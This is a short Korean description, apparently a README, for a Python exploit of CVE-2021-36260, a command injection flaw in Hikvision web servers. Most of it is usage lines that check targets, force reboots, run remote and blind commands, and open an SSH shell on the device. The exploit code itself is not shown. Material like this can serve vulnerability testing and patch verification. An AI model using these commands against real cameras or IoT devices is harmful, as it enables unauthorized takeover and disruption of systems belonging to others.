
Hikvision 웹 서버의 CVE-2021-36260 명령 주입용 Python 익스플로잇. 안전/비안전 취약점 검증, 원격 명령 실행 및 IoT 장치에서의 SSH 셸 액세스를 지원합니다.
CVE-2021-36260는 일부 Hikvision 제품의 웹 서버에서 발생하는 POC 명령 주입 취약점입니다. 불충분한 입력 검증으로 인해, 공격자는 악성 명령이 포함된 일부 메시지를 전송하여 명령 주입 공격을 실행할 수 있습니다.
Exploit 제목: Hikvision 웹 서버 빌드 210702 - 명령 주입
Exploit 작성자: bashis -- shubtheone이 오류 업데이트
공급업체 홈페이지: https://www.hikvision.com/
버전: 1.0
CVE: CVE-2021-36260
참조: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
참고:
[예시] 안전한 취약점/검증 확인: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
안전 및 위험 취약점/검증 확인: ('안전한 확인'으로 검증되지 않은 경우에만 '위험한 확인'을 사용합니다) $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
위험한 취약점/검증 확인: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
SSH 셸 실행 및 연결: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
명령 실행: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
블라인드 명령 실행: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"